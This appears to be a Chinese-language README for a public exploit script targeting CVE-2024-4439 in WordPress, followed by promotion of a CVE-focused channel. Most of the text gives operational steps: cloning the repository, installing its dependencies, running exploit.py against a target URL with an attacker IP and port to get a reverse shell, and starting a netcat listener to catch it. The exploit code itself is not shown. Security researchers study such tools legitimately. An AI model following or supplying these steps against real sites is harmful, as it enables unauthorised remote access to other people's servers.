此Python脚本演示了针对漏洞CVE-2024-4439的利用方法。你可以使用此脚本来测试存在漏洞的WordPress站点。
开始之前
git clone https://github.com/soltanali0/CVE-2024-4439.git
cd CVE-2024-4439
pip install -r r.txt --break-system-packages
使用以下命令运行脚本:
python3 exploit.py -u https://target.com/ --ip ServerIp --port 8000
-u:指定目标WordPress站点的URL。--ip:定义攻击者的IP地址。--port:指定用于反弹shell的端口号。然后在服务器上运行netcat:
nc -lvp 8000
GO-TO CVE是一个专用频道,我在此探索各种漏洞及其影响和缓解策略。我每周发布特定CVE的详细分析,包括概念验证(PoC)利用代码、代码片段以及攻击者如何利用这些漏洞的说明。
在该频道中,我旨在教育安全爱好者和专业人士,使其认识到漏洞意识的重要性以及抵御潜在威胁所需的步骤。通过理解诸如CVE-2024-4439之类的漏洞,我们可以更好地保护自己的系统和应用程序。
欢迎加入我的网络安全学习与知识分享之旅!
• https://github.com/d0rb/CVE-2024-4439 • https://github.com/MielPopsssssss/CVE-2024-4439